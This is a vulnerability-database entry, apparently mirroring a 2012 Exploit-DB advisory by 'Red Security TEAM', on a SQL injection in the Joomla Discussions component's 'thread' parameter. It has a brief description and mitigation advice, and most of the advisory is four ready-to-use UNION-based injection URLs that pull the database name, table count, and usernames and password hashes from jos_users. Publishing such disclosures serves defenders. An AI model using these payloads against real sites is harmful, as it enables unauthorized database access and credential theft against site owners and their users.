Joomla Discussions Component (com_discussions) SQL Injection Vulnerability

vendor:

Joomla Discussions Component (com_discussions)

by:

Red Security TEAM

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla Discussions Component (com_discussions)

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: CentOS

2012

Joomla Discussions Component (com_discussions) SQL Injection Vulnerability

An attacker can exploit a SQL injection vulnerability in the Joomla Discussions Component (com_discussions) to gain access to the database. The attacker can use the vulnerable URL parameter 'thread' to inject malicious SQL code. The attacker can use the malicious code to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# 
# Title     : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
# Author    : Red Security TEAM
# Date      : 17/01/2012
# Risk      : High
# Software  : http://extensions.joomla.org/extensions/communication/forum/13560
# Tested On : CentOS
# Contact   : Info [ 4t ] RedSecurity [ d0t ] COM
# Home      : http://RedSecurity.COM
#
# Exploit   :
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=[SQLi]
#
# Example   : 
#
# 1. [Get Database Name]
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a
# 2. [Get  Tables  Name]
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F7574706F7374715F6F65646576)--+a
# 3. [Get      Username]
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.username as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a
# 4. [Get      Password]
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.password as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a
#